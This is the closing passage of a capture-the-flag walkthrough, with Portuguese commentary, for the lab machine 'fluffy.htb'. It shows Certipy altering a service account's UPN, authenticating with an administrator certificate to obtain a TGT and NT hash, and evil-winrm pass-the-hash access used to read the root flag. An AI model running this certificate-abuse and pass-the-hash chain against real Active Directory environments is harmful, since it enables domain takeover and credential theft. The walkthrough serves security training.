[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'[0x0539] > obtendo a hash do
administrator e obtendo a flag
r00t!
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.164.91
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': HASH_NTLM
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# evil-winrm -i 10.129.164.91 -u 'administrator' -H 'hash'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
1337_ROOT_:|
*Evil-WinRM* PS C:\Users\Administrator\Documents> Terminamos mais uma máquina, espero que tenha
aprendido algo nessa sala.
Nos vemos nas próximas!